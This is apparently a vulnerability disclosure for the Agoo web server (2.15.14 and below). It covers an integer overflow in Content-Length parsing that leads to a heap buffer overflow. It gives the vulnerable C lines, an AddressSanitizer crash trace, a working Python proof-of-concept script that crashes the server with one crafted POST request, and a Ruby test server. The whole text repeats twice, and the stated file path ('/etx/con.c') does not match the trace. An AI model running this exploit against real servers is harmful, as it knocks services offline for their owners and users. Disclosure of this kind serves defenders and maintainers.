Agoo web server version 2.15.14 and below contains a chained vulnerability: an integer overflow (CWE-190) in HTTP request parsing that leads directly to a heap buffer overflow (CWE-122). An unauthenticated remote attacker can crash the server with a single crafted HTTP POST request, causing a Denial of Service (DoS).
Vulnerable File: /etx/con.c
Line: clen = (size_t)strtoul(v, &vend, 10);
mlen = hend - c->buf + 4 + clen;
if (NULL == (c->req = agoo_req_create(mlen))) {
memcpy(c->req->msg, c->buf, c->bcnt);
ASAN Output
kali@ubuntu:~/agoo-2.15.14/ext/agoo$ I 2026/03/09 01:47:53.811019851 INFO: Agoo 2.15.14 with pid 3775971 is listening on http://:6464.
==3775971==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x610000018109 at pc 0x7f773e8970db bp 0x7f773650f790 sp 0x7f773650ef38
READ of size 1 at 0x610000018109 thread T3
#0 0x7f773e8970da in __interceptor_strncasecmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:524
#1 0x7f77378ec55d in agoo_con_header_value /home/kali/agoo-2.15.14/ext/agoo/con.c:193
#2 0x7f77378ec62c in should_close /home/kali/agoo-2.15.14/ext/agoo/con.c:240
#3 0x7f77378ed3ca in agoo_con_http_read /home/kali/agoo-2.15.14/ext/agoo/con.c:634
#4 0x7f77378eab69 in con_ready_read /home/kali/agoo-2.15.14/ext/agoo/con.c:1212
#5 0x7f773790030a in agoo_ready_go /home/kali/agoo-2.15.14/ext/agoo/ready.c:259
#6 0x7f77378ec426 in agoo_con_loop /home/kali/agoo-2.15.14/ext/agoo/con.c:1385
#7 0x7f773e242608 in start_thread /build/glibc-B3wQXB/glibc-2.31/nptl/pthread_create.c:477
#8 0x7f773e38c352 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x11f352)
POC:
import socket
HOST, PORT = "127.0.0.1", 6464
CLEN = 18446744073709551498 # calculated: 119 + 4 + CLEN wraps to 5 (mod 2^64)
header = (
f"POST / HTTP/1.1\r\n"
f"Host: localhost:{PORT}\r\n"
f"Content-Type: application/octet-stream\r\n"
f"Content-Length: {CLEN}\r\n"
f"\r\n"
).encode()
payload = header + b"A" * 8
s = socket.socket()
s.settimeout(5)
s.connect((HOST, PORT))
s.sendall(payload)
try:
resp = s.recv(4096)
print(f"Response: {resp[:100]}")
print("[-] Server survived (heap corruption silent without ASAN)")
except ConnectionResetError:
print("[!!!] CONNECTION RESET — server crashed!")
except Exception as e:
print(f"[*] Exception: {e}")
s.close()
SERVER:
require 'agoo'
class PostHandler
def call(req)
[200, {}, ["OK"]]
end
end
Agoo::Server.init(6464, '/tmp/agoo_heap/public', thread_count: 1)
Agoo::Server.handle(:POST, '/', PostHandler.new)
Agoo::Server.start()
sleep
File: /tmp/agoo_heap/public/index.html
test
Agoo web server version 2.15.14 and below contains a chained vulnerability: an integer overflow (CWE-190) in HTTP request parsing that leads directly to a heap buffer overflow (CWE-122). An unauthenticated remote attacker can crash the server with a single crafted HTTP POST request, causing a Denial of Service (DoS).
Vulnerable File: /etx/con.c
Line: clen = (size_t)strtoul(v, &vend, 10);
mlen = hend - c->buf + 4 + clen;
if (NULL == (c->req = agoo_req_create(mlen))) {
memcpy(c->req->msg, c->buf, c->bcnt);
ASAN Output
kali@ubuntu:~/agoo-2.15.14/ext/agoo$ I 2026/03/09 01:47:53.811019851 INFO: Agoo 2.15.14 with pid 3775971 is listening on http://:6464.
==3775971==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x610000018109 at pc 0x7f773e8970db bp 0x7f773650f790 sp 0x7f773650ef38
READ of size 1 at 0x610000018109 thread T3
#0 0x7f773e8970da in __interceptor_strncasecmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:524
#1 0x7f77378ec55d in agoo_con_header_value /home/kali/agoo-2.15.14/ext/agoo/con.c:193
#2 0x7f77378ec62c in should_close /home/kali/agoo-2.15.14/ext/agoo/con.c:240
#3 0x7f77378ed3ca in agoo_con_http_read /home/kali/agoo-2.15.14/ext/agoo/con.c:634
#4 0x7f77378eab69 in con_ready_read /home/kali/agoo-2.15.14/ext/agoo/con.c:1212
#5 0x7f773790030a in agoo_ready_go /home/kali/agoo-2.15.14/ext/agoo/ready.c:259
#6 0x7f77378ec426 in agoo_con_loop /home/kali/agoo-2.15.14/ext/agoo/con.c:1385
#7 0x7f773e242608 in start_thread /build/glibc-B3wQXB/glibc-2.31/nptl/pthread_create.c:477
#8 0x7f773e38c352 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x11f352)
POC:
import socket
HOST, PORT = "127.0.0.1", 6464
CLEN = 18446744073709551498 # calculated: 119 + 4 + CLEN wraps to 5 (mod 2^64)
header = (
f"POST / HTTP/1.1\r\n"
f"Host: localhost:{PORT}\r\n"
f"Content-Type: application/octet-stream\r\n"
f"Content-Length: {CLEN}\r\n"
f"\r\n"
).encode()
payload = header + b"A" * 8
s = socket.socket()
s.settimeout(5)
s.connect((HOST, PORT))
s.sendall(payload)
try:
resp = s.recv(4096)
print(f"Response: {resp[:100]}")
print("[-] Server survived (heap corruption silent without ASAN)")
except ConnectionResetError:
print("[!!!] CONNECTION RESET — server crashed!")
except Exception as e:
print(f"[*] Exception: {e}")
s.close()
SERVER:
require 'agoo'
class PostHandler
def call(req)
[200, {}, ["OK"]]
end
end
Agoo::Server.init(6464, '/tmp/agoo_heap/public', thread_count: 1)
Agoo::Server.handle(:POST, '/', PostHandler.new)
Agoo::Server.start()
sleep
File: /tmp/agoo_heap/public/index.html
test